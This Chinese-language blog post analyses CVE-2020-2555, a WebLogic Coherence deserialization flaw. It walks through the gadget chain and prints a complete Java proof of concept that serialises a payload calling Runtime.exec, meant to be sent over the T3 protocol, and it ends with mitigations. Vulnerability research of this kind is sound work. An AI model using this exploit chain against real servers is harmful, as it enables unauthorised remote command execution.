Weblogic Coherence组件漏洞初探CVE-2020-2555

2020年1月，互联网上爆出了weblogic反序列化远程命令执行漏洞（CVE-2020-2555），Oracle Fusion中间件Oracle Coherence存在缺陷，攻击者可利用该漏洞再未授权情况下通过构造T3协议请求，获取weblogic服务器权限，执行任意命令。

漏洞影响情况：

Oracle Coherence 3.7.1.17

Oracle Coherence & Weblogic 12.1.3.0.0

Oracle Coherence & Weblogic 12.2.1.3.0

Oracle Coherence & Weblogic 12.2.1.4.0

通过研究发现 Weblogic 10.3.6.0 版本不受影响范围内，虽然该版本默认自带了 Coherence（3.7），通过调试发现该版本默认并未启用 Coherence，所以 Weblogic 10.3.6.0 不在受影响范围内。

漏洞分析

分析环境Weblogic 12.1.3，注意每个Weblogic中的coherence组件可能会有不同，导致poc构造无法通用

开启weblogic远程调试，打包coherence目录加入到idea中，并开启远程JVM调试

在Coherence组件中，出现了像CC链一样可以组成链式调用的类

1) 链式调用

首先介绍几个关键类，这几个类和CC链一样组成了链式调用。

ValueExtractor接口

所有实现了此接口的类都有个extract方法，这个方法是整个调用链的关键方法

ReflectionExtractor类

此类实现了ValueExtractor接口，有个extract方法，此方法有调用method.invoke

可以用以下demo来构造Runtime.getRuntime()

public class Test {
    public static void main(String[] args) {
        ReflectionExtractor reflectionExtractor = new ReflectionExtractor(
                "getMethod",
                new Object[]{"getRuntime", new Class[0]}
        );        Object extract = reflectionExtractor.extract(Runtime.class);
        System.out.println(extract);
    }
}

ChainedExtractor类

此方法也实现了ValueExtractor接口，也有个extract方法，查看此方法

此方法和CC链的一样，利用for循环遍历了数组aExtractor的每一个extract方法，形成了ChainedExtractor调用链。以下demo可以构造Runtime.getRuntime.exec造成命令执行的效果

public class Test {
    public static void main(String[] args) {
        String cmd = "calc";        ValueExtractor[] valueExtractors = new ValueExtractor[]{
                new ReflectionExtractor("getMethod", new Object[]{"getRuntime", new Class[0]}),
                new ReflectionExtractor("invoke", new Object[]{null, new Object[0]}),
                new ReflectionExtractor("exec", new Object[]{new String[]{"cmd", "/c", cmd}})
        };
        ChainedExtractor chainedExtractor = new ChainedExtractor(valueExtractors);
        chainedExtractor.extract(Runtime.class);
    }
}

接下来只要寻找到调用了ChainedExtractor#extract方法的类，即可触发调用链。

2) 触发调用链

LimitFilter#toString

此处漏洞采用了com.tangosol.util.filter.LimitFilter#toString来触发调用链，下图为toString方法，其调用了extract方法

这里涉及两个值，分别是this.m_comparator和this.m_oAnchorTop

this.m_comparator转型成了ValueExtractor类型，并赋值给了extractor，而extractor则调用了extract方法

在extractor方法中传入了this.m_oAnchorTop

得出以下条件：

this.m_comparator为chainedExtractor

this.m_oAnchorTop为Runtime.class

以上两个条件满足即可利用com.tangosol.util.filter.LimitFilter#toString来触发调用链

LimitFilter#toString -》 chainedExtractor#extract

接下来就是寻找调用了LimitFilter#toString的类，在CC5中有个BadAttributeValueExpException，其readObject中会调用到toString

BadAttributeValueExpException

此类在CC5中有出现过，其readObject中会调用到toString

此处会调用valObj的toString方法，而valObj在72行时候被获取

3) 构造POC

先附上整个调用链：

Gadget chain:
        ObjectInputStream.readObject()
            BadAttributeValueExpException.readObject()
                LimitFilter.toString()
                    ChainedExtractor.extract()
                            ReflectionExtractor.extract()
                                Method.invoke()
                                    Class.getMethod()
                            ReflectionExtractor.extract()
                                Method.invoke()
                                    Runtime.getRuntime()
                            ReflectionExtractor.extract()
                                Method.invoke()
                                    Runtime.exec()

得出POC

package com.yyhuni;import com.tangosol.util.ValueExtractor;
import com.tangosol.util.extractor.ChainedExtractor;
import com.tangosol.util.extractor.ReflectionExtractor;
import com.tangosol.util.filter.LimitFilter;import javax.management.BadAttributeValueExpException;
import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;public class POC1 {
    public static void main(String[] args) throws Exception {
        String cmd = "calc";
        ValueExtractor[] valueExtractors = new ValueExtractor[]{
                new ReflectionExtractor("getMethod", new Object[]{"getRuntime", new Class[0]}),
                new ReflectionExtractor("invoke", new Object[]{null, new Object[0]}),
                new ReflectionExtractor("exec", new Object[]{new String[]{"cmd", "/c", cmd}})
//                new ReflectionExtractor("exec", new Object[]{new String[]{"/bin/bash","-c", cmd}})
        };
        ChainedExtractor chainedExtractor = new ChainedExtractor(valueExtractors);        LimitFilter limitFilter = new LimitFilter();        BadAttributeValueExpException BadAttribute = new BadAttributeValueExpException(null);        Field m_comparator = limitFilter.getClass().getDeclaredField("m_comparator");
        m_comparator.setAccessible(true);
        m_comparator.set(limitFilter, chainedExtractor);        Field m_oAnchorTop = limitFilter.getClass().getDeclaredField("m_oAnchorTop");
        m_oAnchorTop.setAccessible(true);
        m_oAnchorTop.set(limitFilter, Runtime.class);        Field val = BadAttribute.getClass().getDeclaredField("val");
        val.setAccessible(true);
        val.set(BadAttribute, limitFilter);        //writeObject
        ObjectOutputStream objectOutputStream = new ObjectOutputStream(new FileOutputStream("poc.ser"));
        objectOutputStream.writeObject(BadAttribute);
        objectOutputStream.close();        //readObject
        ObjectInputStream objectIntputStream = new ObjectInputStream(new FileInputStream("poc.ser"));
        objectIntputStream.readObject();
        objectIntputStream.close();
    }
}

使用T3协议发送POC即可弹出计算器

修复

1. 临时解决方案：禁用 weblogic T3 协议。
2. 安装 Oracle 更新补丁，需要登录帐户后下载。